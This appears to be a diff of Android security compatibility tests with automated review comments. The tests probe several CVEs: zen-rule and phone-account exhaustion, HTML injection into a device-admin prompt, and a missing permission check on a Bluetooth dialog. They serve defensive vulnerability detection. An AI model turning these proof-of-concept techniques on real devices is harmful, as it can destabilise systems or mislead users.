+++ b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/AutomaticZenRuleTests.java
@@ -0,0 +1,207 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.AutomaticZenRuleTests;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.AutomaticZenRule;
+import android.app.Instrumentation;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.ComponentName;
+import android.content.Context;
+import android.net.Uri;
+import android.platform.test.annotations.AsbSecurityTest;
+import androidx.test.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+
+@RunWith(AndroidJUnit4.class)
+public class AutomaticZenRuleTests extends StsExtraBusinessLogicTestCase {
+ private static final String URI_STRING = "condition://android";
+ private static final String ZEN_RULE_NAME = "ZenRuleName";
+ private boolean mNotificationPolicyAccessGranted = false;
+ private NotificationManager mNotificationManager = null;
+ private String mPackageName = null;
+ private UiAutomation mUiautomation = null;
+
+ @Before
+ public void setUp() {
+ try {
+ final int timeoutDuration = 5000;
+ final int waitDuration = 100;
+ Instrumentation instrumentation = InstrumentationRegistry.getInstrumentation();
+ Context context = instrumentation.getContext();
+ mNotificationManager = context.getSystemService(NotificationManager.class);
+ mPackageName = context.getPackageName();
+ mUiautomation = instrumentation.getUiAutomation();
+ mUiautomation.executeShellCommand("cmd notification allow_dnd " + mPackageName);
+ long startTime = System.currentTimeMillis();
+ while (System.currentTimeMillis() - startTime < timeoutDuration) {
+ // Busy wait until notification policy access is granted
+ if (mNotificationManager.isNotificationPolicyAccessGranted()) {
+ mNotificationPolicyAccessGranted = true;
+ break;
+ }
+ Thread.sleep(waitDuration);
+ }
+ assumeTrue("Notification policy access not granted", mNotificationPolicyAccessGranted);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ @After
+ public void tearDown() {
+ try {
+ mUiautomation.executeShellCommand("cmd notification disallow_dnd " + mPackageName);
+ } catch (Exception ignoredException) {
+ // Ignoring exceptions
+ }
+ }
+
+ private boolean testUsingAppComponents(ComponentName owner, ComponentName components[]) {
+ int automaticZenRules = 0;
+ boolean isVulnerable = true;
+ final int ruleLimitPerPackage = (components != null && components.length > 1) ? 60 : 200;
+ ArrayList<String> ruleIds = new ArrayList<>();
+ try {
+ // Storing the number of automaticZenRules present before test run
+ automaticZenRules = mNotificationManager.getAutomaticZenRules().size();
+
+ for (int i = 0; i < ruleLimitPerPackage; ++i) {
+ if (components != null) {
+ for (int j = 0; j < components.length; ++j) {
+ int ruleNo = i * components.length + j;
+ Uri conditionId = Uri.parse(URI_STRING + ruleNo);
+ AutomaticZenRule rule = new AutomaticZenRule(ZEN_RULE_NAME + ruleNo, owner,
+ components[j], conditionId, null,
+ NotificationManager.INTERRUPTION_FILTER_ALL, true);
+ String id = mNotificationManager.addAutomaticZenRule(rule);
+ ruleIds.add(id);
+ }
+ } else {
+ Uri conditionId = Uri.parse(URI_STRING + i);
+ AutomaticZenRule rule = new AutomaticZenRule(ZEN_RULE_NAME + i, owner, null,
+ conditionId, null, NotificationManager.INTERRUPTION_FILTER_ALL, true);
+ String id = mNotificationManager.addAutomaticZenRule(rule);
+ ruleIds.add(id);
+ }
+ }
+ } catch (Exception e) {
+ isVulnerable = false;
+ if (!(e instanceof IllegalArgumentException)) {
+ assumeNoException(e);
+ }
+ } finally {
+ try {
+ if (mNotificationPolicyAccessGranted) {
+ // Retrieving the total number of automaticZenRules added by test so that the
+ // test fails only if all automaticZenRules were added successfully
+ automaticZenRules =
+ mNotificationManager.getAutomaticZenRules().size() - automaticZenRules;
+ for (String id : ruleIds) {
+ mNotificationManager.removeAutomaticZenRule(id);
+ }
+ }
+ int ruleLimitPerPackageTotal =
+ components != null ? ruleLimitPerPackage * components.length
+ : ruleLimitPerPackage;
+ boolean allZenRulesAdded = ruleLimitPerPackageTotal == automaticZenRules;
+ isVulnerable = (isVulnerable && allZenRulesAdded);
+ } catch (Exception ignoredException) {
+ // Ignoring exceptions
+ }
+ }
+ return isVulnerable;
+ }
+
+ // b/220735360
+ // Vulnerable library : framework.jar
+ // Vulnerable module : Not applicable
+ // Is Play managed : No
+ @AsbSecurityTest(cveBugId = 220735360)
+ @Test
+ public void testPocCVE_2022_20143() {
+ try {
+ ComponentName appComponent =
+ new ComponentName(mPackageName, PocActivity.class.getCanonicalName());
+ ComponentName[] components = {appComponent};
+ boolean testUsingAppSingleComponentStatus = testUsingAppComponents(null, components);
+ assertFalse("Device is vulnerable to b/220735360!! System can be corrupted by adding"
+ + " many automaticZenRules via NotificationManager#addAutomaticZenRule."
+ + " Note: Device also seems to be vulnerable to b/235823407 and"
+ + " b/242537431", testUsingAppSingleComponentStatus);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ // b/235823407
+ // Vulnerable library : framework.jar
+ // Vulnerable module : Not applicable
+ // Is Play managed : No
+ @AsbSecurityTest(cveBugId = 235823407)
+ @Test
+ public void testPocCVE_2022_20425() {
+ try {
+ ComponentName firstConfigurationActivity =
+ new ComponentName(mPackageName, PocActivity.class.getCanonicalName());
+ ComponentName secondConfigurationActivity =
+ new ComponentName(mPackageName, SecondPocActivity.class.getCanonicalName());
+ ComponentName[] components = {firstConfigurationActivity, secondConfigurationActivity};
+ boolean testUsingAppMultipleComponentStatus = testUsingAppComponents(null, components);
+ assertFalse(
+ "Device is vulnerable to b/235823407!! Bypass fix of CVE-2022-20143:"
+ + " Bypass zen rule limit with different configuration Activity"
+ + " Note: Device also seems to be vulnerable to b/242537431",
+ testUsingAppMultipleComponentStatus);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ // b/242537431
+ // Vulnerable library : framework.jar
+ // Vulnerable module : Not applicable
+ // Is Play managed : No
+ @AsbSecurityTest(cveBugId = 242537431)
+ @Test
+ public void testPocCVE_2022_20455() {
+ try {
+ ComponentName systemComponent =
+ new ComponentName("android", "ScheduleConditionProvider");
+ boolean testUsingSystemComponentStatus = testUsingAppComponents(systemComponent, null);
+ assertFalse(
+ "Device is vulnerable to b/242537431!! System can be corrupted by adding"
+ + " many automaticZenRules via NotificationManager#addAutomaticZenRule",
+ testUsingSystemComponentStatus);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
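Review bot: In testUsingAppComponents the finally block does the rule count, the cleanup loop and the verdict update inside one try whose `catch (Exception ignoredException)` ignores everything. If `getAutomaticZenRules()` or any `removeAutomaticZenRule(id)` throws, the remaining rules stay on the device and `isVulnerable` keeps whatever value it had, so the count confirmation described in the comment is skipped without a trace. Counting first, removing each rule in its own try, and reporting an unreadable count as an assumption failure keeps the verdict and the cleanup independent. The finally block of testPocCVE_2022_20129 in CVE_2022_20129.java has the same shape, with the `assertFalse` itself inside the swallowing try.

```java
        int addedRules = 0;
        Exception countFailure = null;
        try {
            // … unchanged: initial count and rule-adding loop …
        } catch (Exception e) {
            // … unchanged: IllegalArgumentException handling …
        } finally {
            try {
                // Count before cleanup; a failure is reported below as inconclusive.
                addedRules =
                        mNotificationManager.getAutomaticZenRules().size() - automaticZenRules;
            } catch (Exception e) {
                countFailure = e;
            }
            for (String id : ruleIds) {
                try {
                    mNotificationManager.removeAutomaticZenRule(id);
                } catch (Exception ignoredException) {
                    // Keep removing the remaining rules.
                }
            }
        }
        assumeNoException(countFailure);
        int expectedRules =
                components != null ? ruleLimitPerPackage * components.length : ruleLimitPerPackage;
        return isVulnerable && expectedRules == addedRules;
```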
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/PocActivity.java
similarity index 92%
rename from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
rename to tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/PocActivity.java
index 4416990..99ba57f 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/PocActivity.java
@@ -14,7 +14,7 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.AutomaticZenRuleTests;
import android.app.Activity;
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/SecondPocActivity.java
similarity index 86%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/SecondPocActivity.java
index 4416990..0209c9d 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/SecondPocActivity.java
@@ -14,9 +14,9 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.AutomaticZenRuleTests;
import android.app.Activity;
-public class PocActivity extends Activity {
+public class SecondPocActivity extends Activity {
}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0600/CVE_2021_0600.java b/tests/tests/security/src/android/security/cts/CVE_2021_0600/CVE_2021_0600.java
new file mode 100644
index 0000000..7981c42
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0600/CVE_2021_0600.java
@@ -0,0 +1,137 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0600;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.graphics.Rect;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.security.cts.R;
+import android.support.test.uiautomator.By;
+import android.support.test.uiautomator.BySelector;
+import android.support.test.uiautomator.UiDevice;
+import android.support.test.uiautomator.UiObject2;
+import android.support.test.uiautomator.Until;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.TimeUnit;
+import java.util.regex.Pattern;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0600 extends StsExtraBusinessLogicTestCase {
+ private static final long TIMEOUT_MS = 5000;
+ private CompletableFuture<String> mPocActivityReturn;
+ private UiDevice mDevice;
+ private Context mContext;
+
+ // b/179042963
+ // Vulnerable package : com.android.settings (As per AOSP code)
+ // Vulnerable app : Settings.apk (As per AOSP code)
+ @AsbSecurityTest(cveBugId = 179042963)
+ @Test
+ public void testPocCVE_2021_0600() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ mDevice = UiDevice.getInstance(instrumentation);
+ mContext = instrumentation.getContext();
+
+ // Registering a broadcast receiver to receive broadcast from PocActivity.
+ mPocActivityReturn = new CompletableFuture<>();
+ BroadcastReceiver broadcastReceiver = new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ mPocActivityReturn.complete(intent.getStringExtra(
+ mContext.getString(R.string.cve_2021_0600_keyException)));
+ } catch (Exception e) {
+ // ignore.
+ }
+ }
+ };
+ mContext.registerReceiver(broadcastReceiver,
+ new IntentFilter(mContext.getString(R.string.cve_2021_0600_action)));
+
+ // Launch the PocActivity which in turn starts DeviceAdminAdd activity with normal
+ // text as 'explanation'.
+ Intent intent = new Intent(mContext, PocActivity.class);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ intent.putExtra(mContext.getString(R.string.cve_2021_0600_keyHtml), false);
+ mContext.startActivity(intent);
+ String pocActivityException = mPocActivityReturn.get(TIMEOUT_MS, TimeUnit.MILLISECONDS);
+ assumeTrue(pocActivityException, pocActivityException.trim()
+ .equals(mContext.getString(R.string.cve_2021_0600_noException)));
+
+ // Get the height of the normal text with no formatting. Because width is same both
+ // with and without fix, height is being used for comparing the with and without
+ // fix behaviour.
+ int heightWoHtml = getVulnerableUIHeight();
+ assumeTrue(heightWoHtml != -1);
+
+ // Launch PocActivity again such that DeviceAdminAdd activity starts with formatted text
+ // this time.
+ mPocActivityReturn = new CompletableFuture<>();
+ intent.putExtra(mContext.getString(R.string.cve_2021_0600_keyHtml), true);
+ mContext.startActivity(intent);
+ pocActivityException = mPocActivityReturn.get(TIMEOUT_MS, TimeUnit.MILLISECONDS);
+ assumeTrue(pocActivityException, pocActivityException
+ .equalsIgnoreCase(mContext.getString(R.string.cve_2021_0600_noException)));
+
+ // Get the height of HTML text with formatting.
+ int heightWithHtml = getVulnerableUIHeight();
+ assumeTrue(heightWithHtml != -1);
+
+ // On vulnerable device, the text displayed on the screen will be HTML formatted, so
+ // there will be considerable increase in height of the text due to <h1> tag, if there
+ // is at least 20% increase in height, the test will fail.
+ assertFalse(mContext.getString(R.string.cve_2021_0600_failMsg),
+ heightWithHtml > 1.2 * heightWoHtml);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ private int getVulnerableUIHeight() {
+ Pattern pattern = Pattern.compile(mContext.getString(R.string.cve_2021_0600_pattern),
+ Pattern.CASE_INSENSITIVE);
+ BySelector selector = By.text(pattern);
+ assumeTrue(mContext.getString(R.string.cve_2021_0600_patternNotFound, pattern),
+ mDevice.wait(Until.hasObject(selector), TIMEOUT_MS));
+ UiObject2 obj = mDevice.findObject(selector);
+ if (obj != null && obj.getText() != null
+ && obj.getText().contains(mContext.getString(R.string.cve_2021_0600_targetText))) {
+ Rect bounds = obj.getVisibleBounds();
+ return bounds.bottom - bounds.top;
+ }
+ return -1;
+ }
+}
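Review bot: The BroadcastReceiver registered in testPocCVE_2021_0600 is never unregistered, so it stays registered (and keeps referencing `mPocActivityReturn`) on every exit path, including the assumption failures. Wrapping the statements after `registerReceiver` in `try { … } finally { mContext.unregisterReceiver(broadcastReceiver); }` fixes that. The two-argument `registerReceiver` also leaves the exported state implicit; the result broadcast appears to come from PocActivity in the same package, so passing `Context.RECEIVER_NOT_EXPORTED` as a third argument would keep other apps from completing the future, but confirm that against the API level this module builds for. `pocActivityException` can also be null if the extra is missing, which the `.trim()` call would turn into a skipped run.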
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocActivity.java
new file mode 100644
index 0000000..2634a42
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocActivity.java
@@ -0,0 +1,86 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0600;
+
+import static org.junit.Assume.assumeFalse;
+import static org.junit.Assume.assumeNotNull;
+
+import android.app.Activity;
+import android.app.admin.DevicePolicyManager;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.os.Bundle;
+import android.security.cts.R;
+import android.text.Html;
+
+// The vulnerable activity ADD_DEVICE_ADMIN can't be started as a new task hence PocActivity is
+// created to launch it.
+public class PocActivity extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ try {
+ super.onCreate(savedInstanceState);
+
+ // Create an intent to launch DeviceAdminAdd activity.
+ Intent intent = new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN);
+ assumeNotNull(getString(R.string.cve_2021_0600_intentNotFound, intent),
+ intent.resolveActivity(getPackageManager()));
+ intent.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN,
+ new ComponentName(this, PocDeviceAdminReceiver.class));
+
+ // For adding an extra 'explanation' to the intent, creating a charsequence object.
+ CharSequence seq = Html.fromHtml(getString(R.string.cve_2021_0600_targetText));
+ if (getIntent().getBooleanExtra(getString(R.string.cve_2021_0600_keyHtml), false)) {
+ seq = Html.fromHtml(getString(R.string.cve_2021_0600_targetTextHtml));
+ }
+
+ // Using Html.fromHtml() causes whitespaces to occur at the start/end of the text which
+ // are unwanted. Remove the whitespace characters if any at the start and end of the
+ // charsequence.
+ int end = seq.length() - 1;
+ int start = 0;
+ while ((Character.isWhitespace(seq.charAt(start))) && start < end) {
+ ++start;
+ }
+ while ((Character.isWhitespace(seq.charAt(end))) && end > start) {
+ --end;
+ }
+
+ // Check if the charsequence is valid after trimming the whitespaces.
+ assumeFalse(getString(R.string.cve_2021_0600_errorCreateCharSeq), start > end);
+
+ // Adding the extra 'explanation' and launching the activity.
+ intent.putExtra(DevicePolicyManager.EXTRA_ADD_EXPLANATION,
+ seq.subSequence(start, end + 1));
+ startActivity(intent);
+
+ // Send a broadcast to indicate no exceptions occurred.
+ sendBroadcast(new Intent(getString(R.string.cve_2021_0600_action)).putExtra(
+ getString(R.string.cve_2021_0600_keyException),
+ getString(R.string.cve_2021_0600_noException)));
+ } catch (Exception e) {
+ try {
+ // Send a broadcast to report exception.
+ sendBroadcast(new Intent(getString(R.string.cve_2021_0600_action))
+ .putExtra(getString(R.string.cve_2021_0600_keyException), e.getMessage()));
+ } catch (Exception ignored) {
+ // ignore.
+ }
+ }
+ }
+}
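Review bot: Both trimming loops in onCreate call `seq.charAt(...)` before testing the bound, so an empty result from `Html.fromHtml` (where `end` starts at -1) throws from `charAt(0)` instead of reaching the validity check. For all-whitespace text the loops stop at `start == end`, which means `assumeFalse(..., start > end)` can never trigger. Testing the bound first and letting the indices cross makes that check meaningful: `while (start <= end && Character.isWhitespace(seq.charAt(start)))` and `while (end >= start && Character.isWhitespace(seq.charAt(end)))`. Today the empty case is still reported through the catch-all broadcast, but with `e.getMessage()` rather than the `cve_2021_0600_errorCreateCharSeq` text.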
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocDeviceAdminReceiver.java
similarity index 72%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/security/src/android/security/cts/CVE_2021_0600/PocDeviceAdminReceiver.java
index 4416990..4d429cf 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0600/PocDeviceAdminReceiver.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,9 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2021_0600;
-import android.app.Activity;
+import android.app.admin.DeviceAdminReceiver;
-public class PocActivity extends Activity {
+public class PocDeviceAdminReceiver extends DeviceAdminReceiver {
}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_39738.java b/tests/tests/security/src/android/security/cts/CVE_2021_39738.java
new file mode 100644
index 0000000..7d8daea
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_39738.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.pm.PackageManager;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_39738 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 216190509)
+ @Test
+ public void testPocCVE_2021_39738() {
+ try {
+ Context context = getApplicationContext();
+ PackageManager pm = context.getPackageManager();
+
+ // Skip test for non-automotive builds
+ assumeTrue(
+ "Skipping test: " + PackageManager.FEATURE_AUTOMOTIVE + " missing",
+ pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE));
+
+ // BluetoothPairingDialog activity should require BLUETOOTH_PRIVILEGED permission
+ final String pkgName = "com.android.car.settings";
+ ComponentName component =
+ new ComponentName(pkgName, pkgName + ".bluetooth.BluetoothPairingDialog");
+ String permission = pm.getActivityInfo(component, 0 /* flags */).permission;
+ assertTrue(
+ "Vulnerable to b/216190509",
+ permission.contains(android.Manifest.permission.BLUETOOTH_PRIVILEGED));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
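Review bot: `ActivityInfo.permission` is null when the activity declares no permission, which is presumably the unprotected state this test is meant to catch. `permission.contains(...)` then throws a NullPointerException that the surrounding `catch (Exception e)` converts into an assumption failure, so the run is skipped instead of failing. A null-safe exact comparison avoids that: `assertTrue("Vulnerable to b/216190509", android.Manifest.permission.BLUETOOTH_PRIVILEGED.equals(permission));`. Using `equals` rather than `contains` also stops a longer permission name that merely embeds the string from passing.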
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20129/CVE_2022_20129.java b/tests/tests/security/src/android/security/cts/CVE_2022_20129/CVE_2022_20129.java
new file mode 100644
index 0000000..45cc049
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20129/CVE_2022_20129.java
@@ -0,0 +1,120 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20129;
+
+import static android.Manifest.permission.MODIFY_PHONE_STATE;
+import static android.telecom.PhoneAccount.CAPABILITY_CALL_PROVIDER;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.ComponentName;
+import android.content.Context;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.telecom.PhoneAccount;
+import android.telecom.PhoneAccountHandle;
+import android.telecom.TelecomManager;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2022_20129 extends StsExtraBusinessLogicTestCase {
+
+ @AsbSecurityTest(cveBugId = 217934478)
+ @Test
+ public void testPocCVE_2022_20129() {
+ // maxPhoneAccounts = 10 * MAX_PHONE_ACCOUNT_REGISTRATIONS to accommodate code customization
+ final int maxPhoneAccounts = 100;
+ boolean isVulnerable = false;
+ int phoneAccounts = 0;
+ ArrayList<PhoneAccountHandle> phoneAccountHandleList = new ArrayList<PhoneAccountHandle>();
+ Context context = null;
+ TelecomManager telecomManager = null;
+ UiAutomation uiAutomation = null;
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ context = instrumentation.getContext();
+ telecomManager = context.getSystemService(TelecomManager.class);
+ uiAutomation = instrumentation.getUiAutomation();
+
+ // Store the number of phoneaccounts present before test run
+ uiAutomation.adoptShellPermissionIdentity(MODIFY_PHONE_STATE);
+ phoneAccounts = telecomManager.getAllPhoneAccountHandles().size();
+
+ // Create and register 'maxPhoneAccounts' phoneAccounts
+ String packageName = context.getPackageName();
+ for (int i = 0; i < maxPhoneAccounts; ++i) {
+ PhoneAccountHandle handle =
+ new PhoneAccountHandle(
+ new ComponentName(packageName, PocService.class.getName()),
+ packageName + i);
+ PhoneAccount account =
+ new PhoneAccount.Builder(handle, packageName + i)
+ .setCapabilities(CAPABILITY_CALL_PROVIDER)
+ .addSupportedUriScheme(PhoneAccount.SCHEME_TEL)
+ .build();
+ phoneAccountHandleList.add(handle);
+ try {
+ telecomManager.registerPhoneAccount(account);
+ isVulnerable = true;
+
+ // Enable phoneAccount after registering so that it can be retrieved later using
+ // getAllPhoneAccountHandles, making the test reliable
+ telecomManager.enablePhoneAccount(
+ account.getAccountHandle(), true /* isEnabled */);
+ } catch (IllegalArgumentException expected) {
+ // This exception is expected with fix. Exception message isn't checked to
+ // accommodate code customizations
+ isVulnerable = false;
+ break;
+ }
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // Retrieve the total number of phoneAccounts added by test
+ phoneAccounts = telecomManager.getAllPhoneAccountHandles().size() - phoneAccounts;
+ boolean allAccountsAdded = maxPhoneAccounts == phoneAccounts;
+
+ // Unregister all phoneaccounts used in test
+ for (PhoneAccountHandle handle : phoneAccountHandleList) {
+ telecomManager.unregisterPhoneAccount(handle);
+ }
+ uiAutomation.dropShellPermissionIdentity();
+
+ // Test fails only if 'maxPhoneAccounts' phoneAccounts were added successfully in
+ // test and no exception occurred
+ assertFalse(
+ "Device is vulnerable to b/217934478!!", isVulnerable && allAccountsAdded);
+ } catch (Exception ignored) {
+ // Ignore exceptions here
+ }
+ }
+ }
+}
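Review bot: `uiAutomation.dropShellPermissionIdentity()` sits in the middle of the finally block's try, after the count and the unregister loop. Any exception from `getAllPhoneAccountHandles()` or `unregisterPhoneAccount()` is swallowed by `catch (Exception ignored)`, and the adopted MODIFY_PHONE_STATE shell identity is then left in place for whatever runs next in the process. Give the drop its own guaranteed path, e.g. an inner `try { … } finally { uiAutomation.dropShellPermissionIdentity(); }` around the count and cleanup. It needs a null check, because `uiAutomation` and `telecomManager` are still null if setup failed before they were assigned.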
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2022_20129/PocService.java
similarity index 74%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/security/src/android/security/cts/CVE_2022_20129/PocService.java
index 4416990..cd20396 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/CVE_2022_20129/PocService.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,9 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2022_20129;
-import android.app.Activity;
+import android.telecom.ConnectionService;
-public class PocActivity extends Activity {
+public class PocService extends ConnectionService {
}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/CVE_2022_20143.java b/tests/tests/security/src/android/security/cts/CVE_2022_20143/CVE_2022_20143.java
deleted file mode 100644
index 3c08cbb..0000000
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/CVE_2022_20143.java
+++ /dev/null
@@ -1,117 +0,0 @@
-/*
- * Copyright (C) 2022 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts.CVE_2022_20143;
-
-import static org.junit.Assert.assertFalse;
-import static org.junit.Assume.assumeNoException;
